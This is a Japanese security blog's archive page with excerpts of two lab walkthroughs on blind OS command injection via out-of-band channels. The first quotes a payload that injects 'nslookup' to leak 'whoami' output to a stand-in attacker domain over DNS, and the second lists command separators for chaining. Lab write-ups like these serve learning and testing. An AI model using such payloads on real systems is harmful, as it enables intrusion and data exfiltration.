Shikata Ga Nai

Private? There is no such things.

2021-03-18から1日間の記事一覧

Blind OS command injection with out-of-band data exfiltrationをやってみた

Hello there, ('ω')ノ 帯域外チャネルは、挿入されたコマンドから出力を抽出する簡単な方法を提供して。 whoamiで、コマンドの結果を含む攻撃者のドメインでDNS lookupが発生して。 例えば、下記のように。 & nslookup `whoami`.kgji2ohoyw.web-attacker.com…

Blind OS command injection with out-of-band interactionをやってみた

Hello there, ('ω')ノ 帯域外の相互作用を伴うブラインドOSコマンドインジェクションを。 文字列はコマンドセパレータとして機能して。 コマンドをチェーン化できて。 下記のコマンドセパレータは、WindowsとUnixベースの両方で機能して。 &&&||| まずは、下…